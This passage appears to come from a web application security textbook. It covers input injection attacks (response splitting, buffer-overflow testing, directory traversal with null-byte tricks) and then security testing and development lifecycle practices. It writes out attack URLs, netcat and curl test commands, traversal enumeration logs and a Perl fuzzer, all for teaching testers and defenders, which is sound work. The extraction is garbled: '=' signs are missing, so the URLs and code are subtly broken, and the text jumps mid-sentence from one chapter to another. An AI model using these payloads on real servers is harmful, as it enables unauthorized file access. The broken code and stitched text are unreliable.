host These attacks may be specific to the operating system, such as inserting a semicolon to run arbitrary commands on a Unix web server. An application may intend to execute a command on the web server, but be tricked into executing alternate commands through the use of special characters. • Application content An attacker may be able to generate errors that reveal information about the application’s programming language. Other attacks might bypass restrictions on the types of files retrieved by a browser. For example, many versions of the Nimda worm used an alternate encoding of a slash character (used to delimit directories) to bypass the IIS security check that was supposed to prevent users from requesting files outside of the web document root. • Buffer overflows in the server Overflow attacks have plagued programs for years and web applications are no different. This attack involves passing extremely large input into an application that ultimately extends beyond its allocated memory space and thus corrupts other areas in memory. The result may be an application crash, or when specially crafted input is supplied, it could end up executing arbitrarily supplied code. Buffer overflows are typically more of a concern for compiled languages like C and C++ rather than interpreted languages like Perl and Python. The nature of web platforms based on .NET and Java makes application-layer buffer overflows very difficult 224 Hacking Exposed Web Applications because they don’t allow the programmer to deal directly with stack and heap allocations (which are the playground of buffer overflows). A buffer overflow will more likely exist in the language platform. • Obtain arbitrary data access A user may be able to access data for a peer user, such as one customer being able to view another customer’s billing information. A user may also be able to access privileged data, such as an anonymous user being able to enumerate, create, or delete users. Data access also applies to restricted files or administration areas of the application. WHERE TO FIND ATTACK VECTORS Every GET and POST parameter is a potential target for input validation attacks. Altering argument values, whether they are populated from FORM data or generated by the application, is a trivial feat. The easiest points of attack are input fields in forms. Common fields are Login Name, Password, Address, Phone Number, Credit Card Number, and Search. Other fields that use drop-down menus should not be overlooked, either. The first step is to enumerate these fields and their approximate input type. Don’t be misled that input validation attacks can only be performed against fields that the user must complete. Every variable in the GET or POST request can be attacked. The attack targets can be identified by performing an in-depth crawl of the application that simultaneously catalogs files, parameters, and form fields. This is often done using automated tools. Cookie values are another target. Cookies contain values that might never be intended for manipulation by a user, but they can still be injected into to perform SQL injection or other injection attacks. The cookie is simply a specific instance of an HTTP header. In fact, any HTTP header is a vector for input validation attacks. Another example of HTTP header-targeted attacks includes HTTP response splitting, in which a legitimate response is prematurely truncated in order to inject a forged set of headers (usually cookies or cache-control, which do the maximum damage client-side). Let’s take a closer look at HTTP response splitting. This attack targets applications that use parameters to indicate redirects. For example, here is a potentially vulnerable URL: http://website/redirect.cgi?page http://website/welcome.cgi A good input validation routine would ensure that the value for the page parameter consists of a valid URL. Yet if arbitrary characters can be included, then the parameter might be rewritten with something like this: http://website/redirect.cgi?page 0d%0aContent-Type:%20text/ html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/ html%0d%0a%0d%0a%3chtml%3eHello, world!%3c/html%3e Chapter 6: Input Injection Attacks 225 The original value of page has been replaced with a series of characters that mimics the HTTP response headers from a web server and includes a simple HTML string for “Hello, world!” The malicious payload is more easily understood by replacing the encoded characters: Content-Type: text/html HTTP/1.1 200 OK Content-Type: text/html Hello, world! The end result is that the web browser displays this faked HTML content rather than the HTML content intended for the redirect. The example appears innocuous, but a malicious attack could include JavaScript or content that appears to be a request for the user’s password, Social Security number, credit card information, or other sensitive information. The point of this example is not how to create an effective phishing attack, but to demonstrate how a parameter’s content can be manipulated to produce unintended effects. BYPASS CLIENT-SIDE VALIDATION ROUTINES If your application’s input validation countermeasures can be summarized with one word, JavaScript, then the application is not as secure as you think. Client-side JavaScript can always be bypassed. Some personal proxy, personal firewall, and cookie-management software tout their ability to strip pop-up banners and other intrusive components of a web site. Many computer professionals (paranoiacs?) turn off JavaScript completely in order to avoid the latest e-mail virus. In short, there are many legitimate reasons and straightforward methods for Internet users to disable JavaScript. Of course, disabling JavaScript tends to cripple most web applications. Luckily, we have several tools that help surgically remove JavaScript or enable us to submit content after the JavaScript check has been performed, which allows us to bypass client-side input validation. With a local proxy such as Burp, we can hold a GET or POST request before it is sent to the server. By doing so, we can enter data in the browser that passes the validation requirements, but then modify any value in the proxy while it’s held before forwarding it along to the server. COMMON INPUT INJECTION ATTACKS Let’s examine some common input validation attack payloads. Even though many of the attacks merely dump garbage characters into the application, other payloads contain specially crafted strings. 226 Hacking Exposed Web Applications Buffer Overflow Buffer overflows are less likely to appear in applications written in interpreted or highlevel programming languages. For example, you would be hard-pressed to write a vulnerable application in PHP or Java. Yet an overflow may exist in one of the language’s built-in functions. In the end, it is probably better to spend time on other input validation issues, session management, and other web security topics. Of course, if your application consists of a custom ISAPI filter for IIS or a custom Apache module, then testing for buffer overflows or, perhaps more effectively, conducting a code security review is a good idea (see Chapter 10). To execute a buffer overflow attack, you merely dump as much data as possible into an input field. This is the most brutish and inelegant of attacks, but useful when it returns an application error. Perl is well suited for conducting this type of attack. One instruction creates whatever length necessary to launch against a parameter: $ perl -e 'print "a" x 500' aaaaaaa...repeated 500 times You can create a Perl script to make the HTTP requests (using the LWP module), or dump the output through netcat. Instead of submitting the normal argument, wrap the Perl line in back ticks and replace the argument. Here’s the normal request: $ echo –e "GET /login.php?user faustus\nHTTP/1.0\n\n" | \ nc –vv website 80 Here's the buffer test, calling on Perl from the command line: $ echo –e "GET /login.php?user \ > `perl –e 'print "a" x 500'`\nHTTP/1.0\n\n" | \ nc –vv website 80 This sends a string of 500 "a" characters for the user value to the login.php file. This Perl trick can be used anywhere on the Unix (or Cygwin) command line. For example, combining this technique with the cURL program reduces the problem of dealing with SSL: $ curl https://website/login.php?user `perl –e 'print "a" x 500'` As you try buffer overflow tests with different payloads and different lengths, the target application may return different errors. These errors might all be “password incorrect,” but some of them might indicate boundary conditions for the user argument. The rule of thumb for buffer overflow testing is to follow basic differential analysis or anomaly detection: 1. Send a normal request to an application and record the server’s response. Chapter 6: Input Injection Attacks 227 2. Send the first buffer overflow test to the application, and record the server’s response. 3. Send the next buffer, and record the server’s response. 4. Repeat step 3 as necessary. Whenever the server’s response differs from that of a “normal” request, examine what has changed. This helps you track down the specific payload that produces an error (such as 7,809 slashes on the URL are acceptable, but 7,810 are not). In some cases, the buffer overflow attack enables the attacker to execute arbitrary commands on the server. This task is more difficult to produce once, but simple to replicate. In other words, experienced security auditing is required to find a vulnerability and to create an exploit, but an unsophisticated attacker can download and run a premade exploit. Most of the time these buffer overflow attacks are performed “blind.” Without access to the application to attach a debugger or to view log or system information, crafting a buffer overflow that results in system command execution is very difficult. The FrontPage Services Extension overflow on IIS, for example, could not have been crafted without full access to a system for testing. Canonicalization (dot-dot-slash) These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. The actual server, IIS and Apache, for example, is hopefully smart enough to stop this. IIS fell victim to such problems due to logical missteps in decoding URL characters and performing directory traversal security checks. Two well-known examples are the IIS Superfluous Decode (..%255c..) and IIS Unicode Directory Traversal (..%c0%af..) vulnerabilities. More information about these vulnerabilities is at the Microsoft web site at http://www and .com/technet/security/bulletin/MS00-078.mspx. A web application’s security is always reduced to the lowest common denominator. Even a robust web server falls due to an insecurely written application. The biggest victims of canonicalization attacks are applications that use templates or parse files from the server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are fair game. This type of functionality is evident from the URL and is not limited to any one programming language or web server: /menu.asp?dimlDisplayer menu.html /webacc?User.html login.htt /SWEditServlet?station path Z&publication id 2043&template login.tem /Getfile.asp?/scripts/Client/login.js /includes/printable.asp?Link customers/overview.htm 228 Hacking Exposed Web Applications This technique succeeds against web servers when the web application does not verify the location and content of the file requested. For example, part of the URL for the login page of Novell’s web-based Groupwise application is /servlet/webacc?User .html=login.htt. This application is attacked by manipulating the User.html parameter: /servlet/webacc?User.html ../../../WebAccess/webacc.cfg%00 This directory traversal takes us out of the web document root and into configuration directories. Suddenly, the login page is a window to the target web server—and we don’t even have to log in! Many embedded devices, media servers, and other Internet-connected devices have rudimentary web servers—take a look at many routers and wireless access points sold for home networks. When confronted by one of these servers, always try a simple directory traversal on the URL to see what happens. All too often security plays second fiddle to application size and performance! Advanced Directory Traversal Let’s take a closer look at the Groupwise example. A normal HTTP request returns the HTML content of login.htm: GroupWise WebAccess Login ..remainder of page truncated... The first alarm that goes off is that the webacc servlet takes an HTML file (login.htt) as a parameter because it implies that the application loads and presents the file supplied to the User.html parameter. If the User.html parameter receives a value for a file that does not exist, then we would expect some type of error to occur. Hopefully, the error gives us some useful information. An example of the attack in a URL, http://website/ servlet/ webacc?user.html=nosuchfile, produces the following response: File does not exist: c:\Novell\java\servlets\com\novell\webaccess\ templates/nosuchfile/login.htt Cannot load file: c:\Novell\java\servlets\com\novell\webaccess\ templates/nosuchfile/login.htt. The error discloses the application’s full installation path. Additionally, we discover that the login.htt file is appended by default to a directory specified in the user.html Chapter 6: Input Injection Attacks 229 parameter. This makes sense because the application must need a default template if no user.html argument is passed. The login.htt file, however, gets in the way of a good and proper directory traversal attack. To get around this, we’ll try an old trick developed for use against Perl-based web applications: the null character. For example: http://website/servlet/webacc?user.html ../../../../../../../boot.ini%00 [boot loader] timeout 30 default multi(0)disk(0)rdisk(0)partition(5)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(5)\WINNT "Win2K" /fastdetect C:\BOOTSECT.BSD "OpenBSD" C:\BOOTSECT.LNX "Linux" C:\CMDCONS\BOOTSECT.DAT "Recovery Console" /cmdcons Notice that even though the application appends login.htt to the value of the user .html parameter, we have succeeded in obtaining the content of a Windows boot.ini file. The trick is appending %00 to the user.html argument. The %00 is the URLencoded representation of the null character, which carries a very specific meaning in a programming language like C when used with string variables. In the C language, a string is really just an arbitrarily long array of characters. In order for the program to know where a string ends, it reads characters until it reaches a special character to delimit the end: the null character. Therefore, the web server will pass the original argument to the user.html variable, including the %00. When the servlet engine interprets the argument, it still appends login.htt, turning the entire argument string into a value like this: ../../../../../../../boot.ini%00login.htt A programming language like Perl actually accepts null characters within a string; it doesn’t use them as a delimiter. However, operating systems are written in C (and a mix of C++). When a language like Perl or Java must interact with a file on the operating system, it must interact with a function most likely written in C. Even though a string in Perl or Java may contain a null character, the operating system function will read each character in the string until it reaches the null delimiter, which means the login.htt is ignored. Web servers decode %xx sequences as hexadecimal values. Consequently, the %00 character is first translated by the web server to the null character, and then passed onto the application code (Perl in this case), which accepts the null as part of the parameter’s value. Alternate character encoding with Unicode may also present challenges in the programming language. An IIS superfluous decode vulnerability was based on using alternate Unicode encoding to represent the slash character. Forcing an application into accessing arbitrary files can sometimes take more tricks than just the %00. The following are some more techniques. 230 Hacking Exposed Web Applications • ../../file.asp%00.jpg The application performs rudimentary name validation that requires an image suffix (.jpg or .gif). • ../../file.asp%0a The newline character works just like the null. This might work when an input filter strips %00 characters, but not other malicious payloads. • /valid_dir/../../../file.asp The application performs rudimentary name validation on the file source. It must be within a valid directory. Of course, if it doesn’t remove directory traversal characters, then you can easily escape the directory. • valid_file.asp../../../../file.asp The application performs name validation on the file, but only performs a partial match on the filename. • %2e%2e%2f%2e%2e%2ffile.asp (../../file.asp) The application performs name validation before the argument is URL decoded, or the application’s name validation routine is weak and cannot handle URL-encoded characters. Navigating Without Directory Listings Canonicalization attacks allow directory traversal inside and outside of the web document root. Unfortunately, they rarely provide the ability to generate directory listings—and it’s rather difficult to explore the terrain without a map! However, there are some tricks that ease the difficulty of enumerating files. The first trick is to find out where the actual directory root begins. This is a drive letter on Windows systems and most often the root (“/”) directory on Unix systems. IIS makes this a little easier, since the top-most directory is “InetPub” by default. For example, find the root directory (drive letter) on an IIS host by continually adding directory traversals until you successfully obtain a target HTML file. Here’s an abbreviated example of tracking down the root for a target application’s default.asp file: Sent: /includes/printable.asp?Link ../inetpub/wwwroot/default.asp Return: Microsoft VBScript runtime error '800a0046' File not found /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../inetpub/wwwroot/default.asp Return: Microsoft VBScript runtime error '800a0046' File not found /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../../inetpub/wwwroot/ default.asp Return: Microsoft VBScript runtime error '800a0046' File not found /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../../../inetpub/wwwroot/ default.asp Return: Microsoft VBScript runtime error '800a0046' ...source code of default.asp returned!... Chapter 6: Input Injection Attacks 231 It must seem pedantic to go through the trouble of finding the exact number of directory traversals when a simple ../../../../../../../../../../ would suffice. Yet, before you pass judgment, take a closer look at the number of escapes. There are four directory traversals necessary before the printable.asp file dumps the source code. If we assume that the full path is /inetpub/wwwroot/includes/printable .asp, then we should need to go up three directories. The extra traversal steps imply that the /includes directory is mapped somewhere else on the drive, or the default location for the Link files is somewhere else. The printable.asp file we found is vulnerable to this attack because the file does not perform input validation. This is evident from a single line of code from the file: Link = "D:\Site server\ data\publishing\documents\"&Request.QueryString("Link"). Notice how many directories deep this is? Error codes can also help us enumerate directories. We’ll use information such as “Path not found” and “Permission denied” to track down the directories that exist on a web server. Going back to the previous example, we’ll use the printable.asp to enumerate directories: Sent: /includes/printable.asp?Link ../../../../inetpub Return: Micosoft VBScript runtime error '800a0046' Permission denied /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../../../inetpub/borkbork Return: Micosoft VBScript runtime error '800a0046' Path not found /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../data Return: Micosoft VBScript runtime error '800a0046' Permission denied /includes/printable.asp, line 10 Sent: /includes/printable.asp?Link ../../../../Program%20Files/ Return: Micosoft VBScript runtime error '800a0046' Permission denied /includes/printable.asp, line 10 These results tell us that it is possible to distinguish between files or directories that exist on the web server and those that do not. We verified that the /inetpub and “Program Files” directories exist, but the error indicates that the web application doesn’t have read access to them. If the /inetpub/borkbork directory had returned the error “Permission denied,” then this technique would have failed because we would have no way of distinguishing between real directories (Program Files) and nonexistent ones (borkbork). We also discovered a data directory during this enumeration phase. This 232 Hacking Exposed Web Applications directory is within our mysterious path (D:\Site server\data\publishing\documents\) to the printables.asp file. To summarize the steps for enumerating files: 1. Examine error codes. Determine if the application returns different errors for files that do not exist, directories that do not exist, files that exist (but perhaps have read access denied), and directories that exist. 2. Find the root. Add directory traversal characters until you can determine where the drive letter or root directory starts. 3. Move down the web document root. Files in the web document root are easy to enumerate. You should already have listed most of them when first surveying the application. These files are easier to find because they are a known quantity. 4. Find common directories. Look for temporary directories (/temp, /tmp, /var), program directories (/Program Files, /winnt, /bin, /usr/bin), and popular directories (/home, /etc, /downloads, /backup). 5. Try to access directory names. If the application has read access to the directory, it will list the directory contents. This makes file enumeration easy! A good web application tester’s notebook should contain recursive directory listings for common programs associated with web servers. Having a reference to the directories and configuration files greatly improves the success of directory traversal attacks.The application list should include programs such as Lotus Domino, Microsoft Site Server, and Apache Tomcat. Canonicalization Countermeasures The best defense against canonicalization attacks is to remove all dots (.) from GET and POST parameters. The parsing engine should also catch dots represented in Unicode and hexadecimal. Force all reads to happen from a specific directory. Apply regular expression filters that remove all path information preceding the expected filename. For example, reduce /path1/path2/./path3/file to /file. Secure filesystem permissions also mitigate this attack. First, run the web server as a least-privilege user: either as the “nobody” account on Unix systems or create a service account on Windows systems with the least privileges required to run the application. (See the “References & Further Reading” section for how to create a service account for ASP.NET applications.) Limit the web server account so it can only read files from directories specifically related to the web application. Move sensitive files such as include files (*.inc) out of the web document root to a directory with proper access control. Ensure that anonymous Internet users cannot directly access directories containing sensitive files and that only users with proper authorization will be granted permission. This mitigates directory traversal attacks that are limited to viewing files within the document root. The server and privileged users are still able to access the files, but the user cannot read them. Chapter 6: Input Injection Attacks 233 HTML Injection Script attacks include any method of submitting HTML-formatted strings to an application that subsequently renders those tags. The simplest script attacks involve entering Notice that the last line calls JavaScript from an entirely different server. This technique circumvents most length restrictions because the badscript.js file can be arbitrarily long, whereas the reference is relatively short. In addition to a layer of obfuscation, URL shortening services can sometimes be used to further reduce the size of the string. These tests are simple to execute against forms. Simply try the strings in any field that is redisplayed. For example, many e-commerce applications present a verification page after you enter your address. Enter ) In summary, performing binary analysis not only helps find secrets, but it helps find bugs in applications, too! Figure 10-10 Tracing the strcat function Chapter 10: The Enterprise Web Application Security Program 397 SECURITY TESTING OF WEB APP CODE Wouldn’t it be great if code review was sufficient to catch all security bugs? Unfortunately, this is not the case for a variety of reasons, primarily because no single security assessment mechanism is perfect. Thus, no matter what level of code review is performed on an application, rigorous security testing of the code in a real-world environment always shakes loose more bugs, some of them quite serious. This section will detail some of the key aspects of web application security testing, including • Fuzz-testing • Test tools, utilities, and harnesses • Pen-testing Fuzzing Fuzzing is sending arbitrary as well as maliciously structured data to an application in an attempt to make it behave unexpectedly. By analyzing the responses, the assessor can identify potential security vulnerabilities. Numerous articles and books have been published on fuzz-testing, so a lengthy discussion is out of scope, but we’ll briefly discuss off-the-shelf fuzzers as well as home-grown varieties here. For more information on fuzzing, see “References & Further Reading” at the end of this chapter. Of course, fuzzing is also performed during black-box testing. In this section, we’ll focus on fuzzing in white-box scenarios, i.e., with a debugger hooked up to the target application so that faults can be easily identified and diagnosed. Off-the-shelf Fuzzers There are a number of off-the-shelf fuzzers. One of the better ones is Spike, which focuses on C and C++ applications. Spike Proxy applies the same fuzzing approach to web applications. Written in Python, it performs input validation and authorization attacks including SQL injection, form input field overflows, and cross-site scripting. Spike Proxy is started by running a batch file (runme.bat) and then configuring the browser to use the local Spike Proxy server (localhost on port 8080). Next, you simply connect to the target web application. The Spike Proxy takes over the connection and creates a test console available at http://spike. The console lists possible attack techniques against the application, including “Delve into Dir,” “argscan,” “dirscan,” “overflow,” and “VulnXML Tests.” Select the individual links to perform these attacks against the application. Spike displays the results of the scans in the lower frame of the browser. Spike Proxy can also be used to find the vulnerability in our secret.dll ISAPI that we created and used earlier for binary analysis. As you saw in that section, having something to “pitch” so the application under analysis can “catch” while being debugged is very useful, as it reveals key aspects of the code while in motion. Fuzzers are great “pitchers.” 398 Hacking Exposed Web Applications For example, to find the vulnerability in the secret.dll ISAPI, load OllyDbg and attach to the web server process as before. Start Spike Proxy and browse to the application, and then browse to the local Spike interface (http://spike). Select Overflow to perform a buffer overflow attack against the ISAPI. As you saw while using OllyDbg in the “Binary Analysis” section, the string passed from the URL is loaded into EDI. The string is written on the stack, as shown in the Stack pane. The overly long string crashes the ISAPI. The access violation is an indication that the ISAPI has crashed. EAX and ECX registers have been overwritten with the 41414141 (hex representation of AAAA). This is shown in Figure 10-11. Building Your Own Fuzzer Any scripting language can be used to build your own fuzzer. Utilities like cURL and netcat can also be wrapped in scripts to simplify the level of effort required to create basic HTTP request-response functionality. Of course, for faster performance, it is always better to write fuzzers in C/C++. Next is a sample Perl script that makes a POST request to our example secret.dll ISAPI web application. Note that we’ve created a loop routine that iterates through several requests containing a random number (between 1 and 50) of As. #!/usr/local/bin/perl -w use HTTP::Request::Common qw(POST GET); use LWP::UserAgent; $ua LWP::UserAgent->new(); $url " vti script/secret.dll"; //Loop for ($i 0; $i < 10; $i++) { //Random A's generated $req $ua->post( $url, [MfcISAPICommand > SecretProc, Secret int(rand(50))]); my $content $req->content; print $content; print "\n\n"; } > 'A'x This script is a very basic fuzzer. Fuzzing a live application can cause it to behave unexpectedly and oftentimes create a denial-ofservice condition. Be sure you properly plan ahead and obtain permission from all application and server stakeholders before attempting to conduct fuzz-testing. Chapter 10: The Enterprise Web Application Security Program 399 EAX,ECX stack registers have been overwritten with “AAA” that are passed from the URL. Long string passed to the web server. Long string of “AAAA” passed by spike displayed on the stack. 0x41414141 = “AAAA” Figure 10-11 OllyDbg displays an access violation in secret.dll while being tested for buffer overflows using Spike Proxy. Test Tools, Utilities, and Harnesses Numerous other tools are available for generic web application testing, but at the time of this writing, the market is just starting to evolve quality assurance (QA) testing tools focused on web app security. Hewlett-Packard provides some of the more popular general web application testing tools, such as Quality Center, which include some security testing functionality. One of the few tools specific to web application security is Hewlett-Packard’s QAInspect. We find that many development shops like to cobble together their own test suites using low-cost (or free) HTTP analysis software. See Chapter 1 for a list of HTTP analysis utilities that can be used to create test harnesses. 400 Hacking Exposed Web Applications Pen-testing Penetration testing (pen-testing) is most aptly described as “adversarial use by experienced attackers.” Other terms have been used to describe the same concept: tiger team testing, ethical hacking, and so on. The word “experienced” in this definition is critical: we find time and again that the quality of results derived from pen-testing is directly proportional to the skill of the personnel who perform the tests. We believe pen-testing should be incorporated into the normal development process for every software product, at least at every major release. Since web applications are much more dynamic than traditional software applications (often receiving substantial updates on a weekly basis), we recommend at least an annual or semi-annual pen-test review for high-value web apps. Pen-testing requires a special type of person, someone who really enjoys circumventing, subverting, and/or usurping technology built by others. At most organizations we’ve worked with, very few individuals are philosophically and practically well-situated to perform such work. It is even more challenging to sustain an internal pen-test team over the long haul, due to this “cognitive dissonance” as well as the perpetual mismatch between the market price for good pen-testing skills and the perceived value by management across successive budget cycles. Thus, we recommend critically evaluating the abilities of internal staff to perform pen-testing and strongly considering an external service provider for such work. A third party gives the added benefit of impartiality, a fact that can be leveraged during external negotiations or marketing campaigns. For example, demonstrating to potential partners that regular third-party pen-testing is conducted can make the difference in competitive outsourcing scenarios. Given that you elect to hire third-party pen-testers to attack your product, here are some of the key issues to consider when striving for maximum return on investment: • Schedule Ideally, pen-testing occurs after the availability of beta-quality code but early enough to permit significant changes before ship date should the pentest team identify serious issues. Yes, this is a fine line to walk. • Liaison Make sure managers are prepared to commit necessary product team personnel to provide information to pen-testers during testing. This will require a moderate level of engagement with the testers so the testers achieve the necessary expertise in your product to deliver good results. • Deliverables Too often, pen-testers deliver a documented report at the end of the engagement and are never seen again. This report collects dust on someone’s desk until it unexpectedly shows up on an annual audit months later after much urgency has been lost. We recommend familiarizing the pen-testers with your in-house bug-tracking systems and having them file issues directly with the development team as the work progresses. Finally, no matter which security testing approach you choose, we strongly recommend that all testing focus on the risks prioritized during threat modeling. This Chapter 10: The Enterprise Web Application Security Program 401 will lend coherence and consistency to your overall testing efforts that will result in regular progress toward reducing serious security vulnerabilities. SECURITY IN THE WEB DEVELOPMENT PROCESS We’ve talked about a number of practices that comprise the full-knowledge analysis methodology, including threat modeling, code review, security testing, and web app security technologies to automate processes. Increasingly, savvy organizations are weaving these disparate tools and processes into the application development lifecycle, so that they have simply become an inherent part of the development process itself. Microsoft has popularized the term Security Development Lifecycle (SDL) to describe its integration of security best practices into the development process (see “References & Further Reading” for links to more information on SDL). We encourage you to read Microsoft’s full description of its implementation of SDL. In the meantime, here are some of our own reflections on important aspects of SDL that we’ve seen in our consulting travels. We’ve organized our thoughts around the industry mantra of “people, process, and technology.” People People are the foundation of any semi-automated process like SDL, so make sure to consider the following tips when implementing an SDL process in your organization. Getting Cultural Buy-In A lot of security books start out with the recommendation to “get executive buy-in” before embarking on a broad security initiative like SDL. Frankly, executive buy-in is only useful if the developers listen to executives, which isn’t always the case in our consulting experience. At any rate, some level of grass-roots buy-in is always needed, no matter how firmly executive management backs the security team; otherwise SDL just won’t get adopted to the extent required to significantly improve application security. Make sure to evangelize and pilot your SDL implementation well at all levels of the organization to ensure it gets widespread buy-in and is perceived as a reasonable and practical mechanism for improving product quality (and thus the bottom line). Emphasizing this will greatly enhance its potential for becoming part of the culture rather than some bolt-on process that everybody mocks (think TPS reports from the movie Office Space). Appoint a Security Liaison on the Development Team The development team needs to understand that they are ultimately accountable for the security of their product, and there is no better way to drive home this accountability than to make it a part of a team member’s job description. Additionally, it is probably unrealistic to expect members of a central enterprise security team to ever acquire the expertise (across releases) of a “local” member of the development team. Especially in 402 Hacking Exposed Web Applications large organizations with substantial, distributed software development operations, where multiple projects compete for attention, having an agent “on the ground” can be indispensable. It also creates great efficiencies to channel training and process initiatives through a single point of contact. Do not make the mistake of holding the security liaison accountable for the security of the application. This must remain the sole accountability of the development team’s leadership and should reside no lower in the organization than the executive most directly responsible for the application. Training Most people aren’t able to do the right thing if they’ve never been taught what it is, and for developers (who have trouble even spelling “security” when they’re on a tight ship schedule) this is extremely true. Thus, training is an important part of an SDL. Training has two primary goals: • Learning the organizational SDL process • Imparting organizational-specific and general secure-coding best practices Develop a curriculum, measure attendance and understanding, and, again, hold teams accountable at the executive level. Starting a developer security training program from scratch is often difficult, especially given the potential impact on productivity. Consider using the results of a pen-test to drive an initial grass-roots training effort focused on concrete issues identified in business-relevant applications. Hiring the Right People Once a web SDL program is defined, fitting people into the program in a manner commensurate with their capabilities is important. Finding a good “fit” requires a delicate balancing of chemistry, skills, and well-designed roles. We can’t help you with the intangibles of chemistry, but here are some pointers to help you get the other stuff right. Enterprises commonly underestimate the complex analytical requirements of a successful application security automation program and, therefore, frequently have trouble finding the right type of person to fill roles on that team. In our view, individuals with the right “fit” have several important qualities: • Deep passion about and technical understanding of common software security threats and mitigations, as well as historical trends related to the same. • Moderately deep understanding of operational security concepts (e.g., TCP/IP security, firewalls, IDS, security patch management, and so on). • Software development experience (understanding how business requirements, use-case scenarios, functional specifications, and the code itself are developed). Chapter 10: The Enterprise Web Application Security Program 403 • Strong project management skills, particularly the ability to multitask across several active projects at once. • Technical knowledge across the whole stack of organizational infrastructure and applications. • The ability to prioritize and articulate technical risk in business terms, without raising false alarms over the inevitable noise generated by automated application assessment tools. Obviously, finding this mix of skills is challenging. Don’t expect to hire dozens of people like this overnight—be conservative in your staffing estimates and tying your overall program goals to them. In our experience, finding this mixture is practically impossible, and most hiring managers will need to make compromises. Our advice is to look for potential hires who have both a software development and a security background, as opposed to a purely operational security background. We’ve found it easier to teach security to experienced software developers than it is to teach software development to operational security professionals. Another easy way to achieve the best of both worlds is to staff separate teams for infrastructure/operational security and another for application security. This structure also provides a viable career ladder, starting with basic trouble-ticket response and leading to more strategic interaction with application development teams. Organizational Structure and Roles In our experience, the most effective implementations of an application assessment program integrate tightly into existing development QA and operational support processes. The challenge here is aligning the goals of diverse teams that potentially report through different arms of the organization: IT operations, security/risk management, internal audit, and software development (which may itself be spread through various business units). Our experience has taught us that the greater the organizational independence you can create between the fox and the chickens (metaphorically speaking), the better. Practically, this means separating security assessment from application development and operational support. Alternatively, we’ve seen organizational structures where security accountability lives within the software QA organization, or within IT operations. We don’t recommend this in most instances because of the potential conflict of interest between delivering applications and delivering secure applications (akin to the fox guarding the chicken coop). Time and again, we’ve seen the importance of providing external checks and balances to the software development/support process (which typically operates under unrealistic deadlines that were set well before security entered the picture). To avoid alienating the software development group by setting up an external dependency for their success, we again strongly recommend providing security subjectmatter experts with software development backgrounds. This type of staffing goes a long way toward avoiding a culture of “security avoidance” in the development process. 404 Hacking Exposed Web Applications Process To lend coherence to the concept of SDL, you might think of each of the major sections of this chapter as a milestone in the software development process. For example, threat modeling occurs at design time, code review follows implementation, and security testing occurs during alpha and beta up through final release. Additional milestones, including developer training, or a prerelease security audit/review, may also be used where appropriate. Figure 10-12 illustrates a hypothetical software development lifecycle with SDL milestones (such as training and threat modeling) overlaid. Beyond thinking about security as an overlay to existing development processes, more holistic process design is critical to long-term success. Next we’ll catalog some of the critical steps in designing a sound “security workflow.” One of the first things we’ve learned to avoid in our many travels in the IT industry is the “build from scratch” syndrome. In any competent mid- to large-sized enterprise IT shop, some support infrastructure almost surely already exists. Our primary advice to those wishing to build a strong web security program is: leverage what’s already there! This involves careful research up front. Learn about how your current organizational application-development quality assurance (QA) process works and where the most efficient integration points lie. Equally important for automated tools that will be integrated into the live production application support process, you’ll need to understand how the current operation’s support infrastructure works, from the “smart hands” contractors in the datacenter who physically touch the servers, to the Tier 1 support Figure 10-12 A sample SDL implementation Chapter 10: The Enterprise Web Application Security Program 405 contractors working at a phone bank in India, through the on-staff Tier 2 and 3 system engineers, all the way to the “Tier 4” development team members (and their management!) who will ultimately receive escalations when necessary. Think hard about how your assessment methodology and toolset will integrate into this existing hierarchy, and where you might need to make some serious adjustments to the existing process. In our experience, the important issues to consider include: • Management awareness and support Executives should understand the relationship of the assessment process to the overall business risk management program, and be supportive of the overall direction (not necessarily intimately aware of the implementation details, however). • Roles and accountability Management should also clearly understand organizational accountability for issues uncovered by the assessment program. It’s probably wisest to follow the accountability model just outlined, from Tier X operational staff all the way up to the senior-most executive “owner” of a given application. • Security policy It should be simple, widely understood within the organization, and practically enforceable. At a minimum, it should describe computing standards, criticality criteria for identified policy violations, and an expected remediation process. It should also consider relevant regulatory standards like the Payment Card Industry Data Security Standard (PCI-DSS). If a good policy doesn’t exist, you’ll need to write it! • Integration with existing SDL There should be a well-documented path from web security findings to the developer’s desktop for bugs of appropriate type and severity. You should also consider the applicability of assessments at different points in the SDL (e.g., preproduction versus production). • The IT trouble-ticketing system If your choice of automation tool doesn’t integrate well here, your project is dead before it even starts. DO NOT plan on implementing your own “security” ticketing system—you will regret this when you discover that you’ll have to hire the equivalent of a duplicate Tier 1 support desk to handle the volume of alerts. Test and tune thoroughly before deploying to production. • Incident response process If there isn’t a disciplined organizational incident escalation process already in existence, you’ll need to engage executive management pronto. Otherwise, the security team will look foolish when alerts overwhelm the existing process (or lack thereof). • Postmortem analysis We’ve seen too many organizations fail to learn from incidents or process failures; make sure you include a robust postmortem process in your overall program. • Process documentation In our experience, the most common external audit finding is lack of process documentation (and we’ve got the scars to prove it!). Don’t make it this easy for the bean-counters—allocate appropriate resources to 406 Hacking Exposed Web Applications create a living repository of standard operating manuals for the organization, if one does not already exist. • Education Just as placing a “secure coding” book on a software developer’s bookshelf does not constitute a security SDL, installing the latest application security scanner on one system engineer’s desktop is also highly ineffective. Provide ongoing training on how to use the system for all levels of users, and document attendance, test understanding, and hold managers accountable. • Meaningful metrics All of the above advice is wonderful, but assuming you implement all or some portion of it, how will you know any of it is working? Security metrics may cause eyes to glaze over, and implementing meaningful performance management in any discipline is tough (let alone software development), but there really is no other way to ensure ROI for the substantial investment demanded by effective software assurance. Don’t flinch, engage key stakeholders, be humble, practical, and make it work. Obviously, these are really brief overviews of potentially quite complex topics. We hope this gives you a start toward further research into these areas. Technology Of course, technology is a key ingredient in any SDL implementation. It can bring efficiency to the SDL process itself by automating some of the more tedious components (such as source code review). SDL should also specify consistent technology standards throughout the development process, such as compile-time parameters (for example, Microsoft’s /GS flag), incorporation of standard input validation routines, and the prohibition of insecure or troublesome functions. Here are some key considerations related to these themes. Automated Code Review Technologies As security continues 